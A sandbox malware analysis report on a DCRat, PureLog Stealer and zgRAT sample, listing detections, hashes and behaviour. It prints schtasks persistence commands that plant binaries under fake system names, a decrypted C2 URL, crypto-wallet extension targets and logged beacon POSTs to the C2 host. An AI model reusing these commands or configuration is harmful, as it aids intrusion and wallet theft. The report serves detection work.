Windows Analysis Report
Z4D3XAZ2jB.exe

Overview

General Information

Sample name: Z4D3XAZ2jB.exe (renamed because original name is a hash value)
Original sample name: 0a5d9cd0a4b6abdbb272262811774a8d.exe
Analysis ID: 1581018
MD5: 0a5d9cd0a4b6abdbb272262811774a8d
SHA1: 9571472c5d0899e517e1c1f84c6c05dfd2abb2b5
SHA256: 9c2ad3d80258af2508987d952dd5a7744bedbdd16260e4f76412ea6696774285
Tags: exe, Zyklon, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Z4D3XAZ2jB.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\Z4D3XAZ2jB.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
    • schtasks.exe (PID: 3616 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2188 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6452 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2120 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6412 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7128 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3368 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2308 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3616 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4144 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2120 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5480 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5252 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7132 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6412 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5252 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7220 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7252 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7384 cmdline: "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 2308 cmdline: C:\Windows\GameBarPresenceWriter\services.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 7176 cmdline: C:\Windows\GameBarPresenceWriter\services.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7208 cmdline: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7244 cmdline: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 7468 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7964 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 8136 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 2188 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 5296 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 3916 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 7192 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7424 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7540 cmdline: "C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7828 cmdline: "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 2208 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • cleanup
{"C2 url": "http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "false", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "false", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                    System Summary

                    Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\Z4D3XAZ2jB.exe, ProcessId: 2004, TargetFilename: C:\Windows\GameBarPresenceWriter\services.exe
                    Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine|base64offset|contains: , Image: C:\Windows\GameBarPresenceWriter\services.exe, NewProcessName: C:\Windows\GameBarPresenceWriter\services.exe, OriginalFileName: C:\Windows\GameBarPresenceWriter\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\GameBarPresenceWriter\services.exe, ProcessId: 2308, ProcessName: services.exe
                    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Windows\GameBarPresenceWriter\services.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Z4D3XAZ2jB.exe, ProcessId: 2004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services
                    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Windows\GameBarPresenceWriter\services.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Z4D3XAZ2jB.exe, ProcessId: 2004, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                    Source: Process started | Author: vburov | Data: Command: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine|base64offset|contains: , Image: C:\Windows\GameBarPresenceWriter\services.exe, NewProcessName: C:\Windows\GameBarPresenceWriter\services.exe, OriginalFileName: C:\Windows\GameBarPresenceWriter\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\GameBarPresenceWriter\services.exe, ProcessId: 2308, ProcessName: services.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-12-26T17:17:12.161494+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.93.162 | 80 | TCP

                    AV Detection

                    Source: Z4D3XAZ2jB.exe | Avira: detected
                    Source: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php | Avira URL Cloud: Label: malware
                    Source: C:\Users\user\Desktop\fxzonGoL.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | Avira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\dVPxoyeA.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\OquQxqjY.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
                    Source: C:\Users\user\Desktop\CNYkWNAB.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                    Source: C:\Users\user\Desktop\YALoKruW.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\RbOZahUq.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\KInsUcJl.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\NPGqEfku.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                    Source: C:\Users\user\Desktop\MgNITBew.log | Avira: detection malicious, Label: TR/Agent.jbwuj
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | Avira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\UAeHorhP.log | Avira: detection malicious, Label: TR/Agent.jbwuj
                    Source: C:\Users\user\Desktop\MoHhbGed.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
                    Source: C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat | Avira: detection malicious, Label: BAT/Delbat.C
                    Source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "false", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "false", "12": "true", "13": "true", "14": "true"}}
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | ReversingLabs: Detection: 63%
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe | ReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\ADqcsYvZ.log | ReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\CNYkWNAB.log | ReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\GmHIOoGs.log | ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\HtvJqEPI.log | ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\MgNITBew.log | ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\MoHhbGed.log | ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\NPGqEfku.log | ReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\PFcqhLrW.log | ReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\SYphwgjk.log | ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\UAeHorhP.log | ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\ZeYGhBeG.log | ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\bCyXfazS.log | ReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\eJTFZLay.log | ReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\hdUdukKE.log | ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\lyXnXruh.log | ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\oPsvdwHZ.log | ReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\qmplAoJV.log | ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\tWJuefum.log | ReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\wySLBGmi.log | ReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\yKbtGcJa.log | ReversingLabs: Detection: 20%
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe | ReversingLabs: Detection: 63%
                    Source: C:\Windows\GameBarPresenceWriter\services.exe | ReversingLabs: Detection: 63%
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe | ReversingLabs: Detection: 63%
                    Source: Z4D3XAZ2jB.exe | Virustotal: Detection: 59%
                    Source: Z4D3XAZ2jB.exe | ReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\ZeYGhBeG.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\HtvJqEPI.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\fxzonGoL.log | Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\dVPxoyeA.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\OquQxqjY.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\CNYkWNAB.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\YALoKruW.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\RbOZahUq.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\KInsUcJl.log | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\NPGqEfku.log | Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\CFoRreZv.log | Joe Sandbox ML: detected
                    Source: Z4D3XAZ2jB.exe | Joe Sandbox ML: detected
                    Source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"One directory"}}
                    Source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://durok.ru/","JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral"]]
                    Source: Z4D3XAZ2jB.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Z4D3XAZ2jB.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File opened: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 0_2_00007FFD9B9194AD
                    Source: C:\Windows\GameBarPresenceWriter\services.exe | Code function: 4x nop then jmp 00007FFD9B7A28B6h | 16_2_00007FFD9B7A26AE
                    Source: C:\Windows\GameBarPresenceWriter\services.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 16_2_00007FFD9B9494AD
                    Source: C:\Windows\GameBarPresenceWriter\services.exe | Code function: 4x nop then jmp 00007FFD9B7A28B6h | 19_2_00007FFD9B7A26AE
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe | Code function: 4x nop then jmp 00007FFD9B7828B6h | 28_2_00007FFD9B7826AE
                    Source: C:\Windows\GameBarPresenceWriter\services.exe | Code function: 4x nop then jmp 00007FFD9B7828B6h | 31_2_00007FFD9B7826AE
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe | Code function: 4x nop then jmp 00007FFD9B7A28B6h | 32_2_00007FFD9B7A26AE
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe | Code function: 4x nop then jmp 00007FFD9B7828B6h | 34_2_00007FFD9B7826AE
                    Source: C:\Windows\GameBarPresenceWriter\services.exe | Code function: 4x nop then jmp 00007FFD9B7A28B6h | 35_2_00007FFD9B7A26AE
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe | Code function: 4x nop then jmp 00007FFD9B7828B6h | 36_2_00007FFD9B7826AE
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe | Code function: 4x nop then jmp 00007FFD9B7828B6h | 37_2_00007FFD9B7826AE

                    Networking

                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 104.21.93.162:80
                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 384 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 1916 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2124 | Expect: 100-continue | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: durok.ru | Content-Length: 2548 | Expect: 100-continue
